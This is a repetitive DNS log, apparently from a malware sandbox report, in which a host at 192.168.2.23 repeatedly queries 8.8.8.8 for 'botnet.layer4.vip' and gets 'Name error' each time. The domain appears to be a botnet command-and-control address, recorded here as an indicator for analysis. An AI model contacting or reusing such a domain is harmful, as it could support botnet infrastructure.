                                  Apr 9, 2023 03:30:47.904769897 CEST8.8.8.8192.168.2.230x8128Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.920728922 CEST8.8.8.8192.168.2.230x8128Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.936323881 CEST8.8.8.8192.168.2.230x8128Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.951767921 CEST8.8.8.8192.168.2.230x8128Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.976279974 CEST8.8.8.8192.168.2.230x6a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.991837978 CEST8.8.8.8192.168.2.230x6a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.015722990 CEST8.8.8.8192.168.2.230x6a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.040074110 CEST8.8.8.8192.168.2.230x6a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.064443111 CEST8.8.8.8192.168.2.230x6a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.080358028 CEST8.8.8.8192.168.2.230x9496Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.104662895 CEST8.8.8.8192.168.2.230x9496Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.120449066 CEST8.8.8.8192.168.2.230x9496Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.136379004 CEST8.8.8.8192.168.2.230x9496Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.151917934 CEST8.8.8.8192.168.2.230x9496Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.176075935 CEST8.8.8.8192.168.2.230xef00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.191576958 CEST8.8.8.8192.168.2.230xef00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.207106113 CEST8.8.8.8192.168.2.230xef00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.222939014 CEST8.8.8.8192.168.2.230xef00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.247230053 CEST8.8.8.8192.168.2.230xef00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.262933016 CEST8.8.8.8192.168.2.230xf11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.278508902 CEST8.8.8.8192.168.2.230xf11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.294323921 CEST8.8.8.8192.168.2.230xf11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.318464041 CEST8.8.8.8192.168.2.230xf11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.342922926 CEST8.8.8.8192.168.2.230xf11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.358843088 CEST8.8.8.8192.168.2.230x25bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.374439955 CEST8.8.8.8192.168.2.230x25bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.398941040 CEST8.8.8.8192.168.2.230x25bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.414501905 CEST8.8.8.8192.168.2.230x25bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.438519955 CEST8.8.8.8192.168.2.230x25bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.462764025 CEST8.8.8.8192.168.2.230xb3e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.486896992 CEST8.8.8.8192.168.2.230xb3e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.511151075 CEST8.8.8.8192.168.2.230xb3e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.527059078 CEST8.8.8.8192.168.2.230xb3e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.551132917 CEST8.8.8.8192.168.2.230xb3e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.575736046 CEST8.8.8.8192.168.2.230x496aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.591545105 CEST8.8.8.8192.168.2.230x496aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.615955114 CEST8.8.8.8192.168.2.230x496aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.640391111 CEST8.8.8.8192.168.2.230x496aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.656317949 CEST8.8.8.8192.168.2.230x496aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.680497885 CEST8.8.8.8192.168.2.230xd072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.704579115 CEST8.8.8.8192.168.2.230xd072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.720518112 CEST8.8.8.8192.168.2.230xd072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.744658947 CEST8.8.8.8192.168.2.230xd072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.768934011 CEST8.8.8.8192.168.2.230xd072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.784972906 CEST8.8.8.8192.168.2.230xc3b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.809387922 CEST8.8.8.8192.168.2.230xc3b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.834037066 CEST8.8.8.8192.168.2.230xc3b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.858109951 CEST8.8.8.8192.168.2.230xc3b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.873858929 CEST8.8.8.8192.168.2.230xc3b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.889800072 CEST8.8.8.8192.168.2.230xbdf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.906352043 CEST8.8.8.8192.168.2.230xbdf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.921871901 CEST8.8.8.8192.168.2.230xbdf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.940752029 CEST8.8.8.8192.168.2.230xbdf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.966012955 CEST8.8.8.8192.168.2.230xbdf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.990731955 CEST8.8.8.8192.168.2.230x68a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.015064001 CEST8.8.8.8192.168.2.230x68a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.039557934 CEST8.8.8.8192.168.2.230x68a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.063662052 CEST8.8.8.8192.168.2.230x68a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.087858915 CEST8.8.8.8192.168.2.230x68a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.103928089 CEST8.8.8.8192.168.2.230x62cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.128114939 CEST8.8.8.8192.168.2.230x62cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.143707037 CEST8.8.8.8192.168.2.230x62cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.168121099 CEST8.8.8.8192.168.2.230x62cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.183654070 CEST8.8.8.8192.168.2.230x62cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.207811117 CEST8.8.8.8192.168.2.230xc949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.232458115 CEST8.8.8.8192.168.2.230xc949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.248383999 CEST8.8.8.8192.168.2.230xc949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.272710085 CEST8.8.8.8192.168.2.230xc949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.296881914 CEST8.8.8.8192.168.2.230xc949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.321461916 CEST8.8.8.8192.168.2.230x1e92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.345983028 CEST8.8.8.8192.168.2.230x1e92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.370528936 CEST8.8.8.8192.168.2.230x1e92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.395147085 CEST8.8.8.8192.168.2.230x1e92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.419341087 CEST8.8.8.8192.168.2.230x1e92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.434977055 CEST8.8.8.8192.168.2.230x6398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.459455013 CEST8.8.8.8192.168.2.230x6398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.475069046 CEST8.8.8.8192.168.2.230x6398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.499458075 CEST8.8.8.8192.168.2.230x6398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.523943901 CEST8.8.8.8192.168.2.230x6398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.539660931 CEST8.8.8.8192.168.2.230xe17fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.564766884 CEST8.8.8.8192.168.2.230xe17fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.589257956 CEST8.8.8.8192.168.2.230xe17fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.604773045 CEST8.8.8.8192.168.2.230xe17fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.620310068 CEST8.8.8.8192.168.2.230xe17fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.636368036 CEST8.8.8.8192.168.2.230xe6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.652216911 CEST8.8.8.8192.168.2.230xe6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.668231010 CEST8.8.8.8192.168.2.230xe6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.692625999 CEST8.8.8.8192.168.2.230xe6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.717168093 CEST8.8.8.8192.168.2.230xe6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.732878923 CEST8.8.8.8192.168.2.230xab9dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.757287025 CEST8.8.8.8192.168.2.230xab9dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.772922993 CEST8.8.8.8192.168.2.230xab9dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.788746119 CEST8.8.8.8192.168.2.230xab9dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.804608107 CEST8.8.8.8192.168.2.230xab9dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.820264101 CEST8.8.8.8192.168.2.230xf930Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.835906029 CEST8.8.8.8192.168.2.230xf930Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.851789951 CEST8.8.8.8192.168.2.230xf930Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.867583036 CEST8.8.8.8192.168.2.230xf930Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.883446932 CEST8.8.8.8192.168.2.230xf930Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.899069071 CEST8.8.8.8192.168.2.230x6244Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.915016890 CEST8.8.8.8192.168.2.230x6244Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.930902004 CEST8.8.8.8192.168.2.230x6244Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.946353912 CEST8.8.8.8192.168.2.230x6244Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.970479012 CEST8.8.8.8192.168.2.230x6244Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.994968891 CEST8.8.8.8192.168.2.230x7bf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.010478973 CEST8.8.8.8192.168.2.230x7bf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.025918961 CEST8.8.8.8192.168.2.230x7bf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.041723013 CEST8.8.8.8192.168.2.230x7bf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.057359934 CEST8.8.8.8192.168.2.230x7bf7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.081547976 CEST8.8.8.8192.168.2.230x893bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.097065926 CEST8.8.8.8192.168.2.230x893bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.121289968 CEST8.8.8.8192.168.2.230x893bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.137177944 CEST8.8.8.8192.168.2.230x893bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.161722898 CEST8.8.8.8192.168.2.230x893bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.186202049 CEST8.8.8.8192.168.2.230xee3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.210304022 CEST8.8.8.8192.168.2.230xee3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.234492064 CEST8.8.8.8192.168.2.230xee3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.258943081 CEST8.8.8.8192.168.2.230xee3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.283056974 CEST8.8.8.8192.168.2.230xee3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.298983097 CEST8.8.8.8192.168.2.230x42ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.323510885 CEST8.8.8.8192.168.2.230x42ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.347938061 CEST8.8.8.8192.168.2.230x42ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.363806009 CEST8.8.8.8192.168.2.230x42ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.388143063 CEST8.8.8.8192.168.2.230x42ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.412750006 CEST8.8.8.8192.168.2.230xef5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.436904907 CEST8.8.8.8192.168.2.230xef5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.452763081 CEST8.8.8.8192.168.2.230xef5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.477137089 CEST8.8.8.8192.168.2.230xef5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.492676020 CEST8.8.8.8192.168.2.230xef5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.508501053 CEST8.8.8.8192.168.2.230x98d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.524049044 CEST8.8.8.8192.168.2.230x98d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.539911032 CEST8.8.8.8192.168.2.230x98d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.555706978 CEST8.8.8.8192.168.2.230x98d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.579765081 CEST8.8.8.8192.168.2.230x98d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.604324102 CEST8.8.8.8192.168.2.230xd45fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.620106936 CEST8.8.8.8192.168.2.230xd45fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.644208908 CEST8.8.8.8192.168.2.230xd45fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.668333054 CEST8.8.8.8192.168.2.230xd45fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.683968067 CEST8.8.8.8192.168.2.230xd45fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.700001001 CEST8.8.8.8192.168.2.230x852cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.727646112 CEST8.8.8.8192.168.2.230x852cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.743205070 CEST8.8.8.8192.168.2.230x852cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.767368078 CEST8.8.8.8192.168.2.230x852cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.783025026 CEST8.8.8.8192.168.2.230x852cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.807276964 CEST8.8.8.8192.168.2.230x1f05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.831568003 CEST8.8.8.8192.168.2.230x1f05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.856030941 CEST8.8.8.8192.168.2.230x1f05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.871541023 CEST8.8.8.8192.168.2.230x1f05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.887101889 CEST8.8.8.8192.168.2.230x1f05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.902916908 CEST8.8.8.8192.168.2.230xb4b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.927263975 CEST8.8.8.8192.168.2.230xb4b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.942718029 CEST8.8.8.8192.168.2.230xb4b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.958534002 CEST8.8.8.8192.168.2.230xb4b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.982996941 CEST8.8.8.8192.168.2.230xb4b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.007236958 CEST8.8.8.8192.168.2.230xace8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.032557964 CEST8.8.8.8192.168.2.230xace8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.056633949 CEST8.8.8.8192.168.2.230xace8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.080801010 CEST8.8.8.8192.168.2.230xace8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.105254889 CEST8.8.8.8192.168.2.230xace8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.121236086 CEST8.8.8.8192.168.2.230x8f20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.145616055 CEST8.8.8.8192.168.2.230x8f20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.169986963 CEST8.8.8.8192.168.2.230x8f20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.194360971 CEST8.8.8.8192.168.2.230x8f20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.210257053 CEST8.8.8.8192.168.2.230x8f20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.225872040 CEST8.8.8.8192.168.2.230x47f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.250267029 CEST8.8.8.8192.168.2.230x47f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.274422884 CEST8.8.8.8192.168.2.230x47f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.289982080 CEST8.8.8.8192.168.2.230x47f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.314368963 CEST8.8.8.8192.168.2.230x47f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.330595970 CEST8.8.8.8192.168.2.230x7b83Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.346303940 CEST8.8.8.8192.168.2.230x7b83Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.361819029 CEST8.8.8.8192.168.2.230x7b83Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.386140108 CEST8.8.8.8192.168.2.230x7b83Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.410543919 CEST8.8.8.8192.168.2.230x7b83Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.434839964 CEST8.8.8.8192.168.2.230x1254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.450836897 CEST8.8.8.8192.168.2.230x1254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.475233078 CEST8.8.8.8192.168.2.230x1254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.491178036 CEST8.8.8.8192.168.2.230x1254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.506849051 CEST8.8.8.8192.168.2.230x1254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.531414986 CEST8.8.8.8192.168.2.230xc059Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.547132015 CEST8.8.8.8192.168.2.230xc059Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.571423054 CEST8.8.8.8192.168.2.230xc059Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.587116003 CEST8.8.8.8192.168.2.230xc059Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.611690998 CEST8.8.8.8192.168.2.230xc059Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.628001928 CEST8.8.8.8192.168.2.230xc5e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.652173996 CEST8.8.8.8192.168.2.230xc5e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
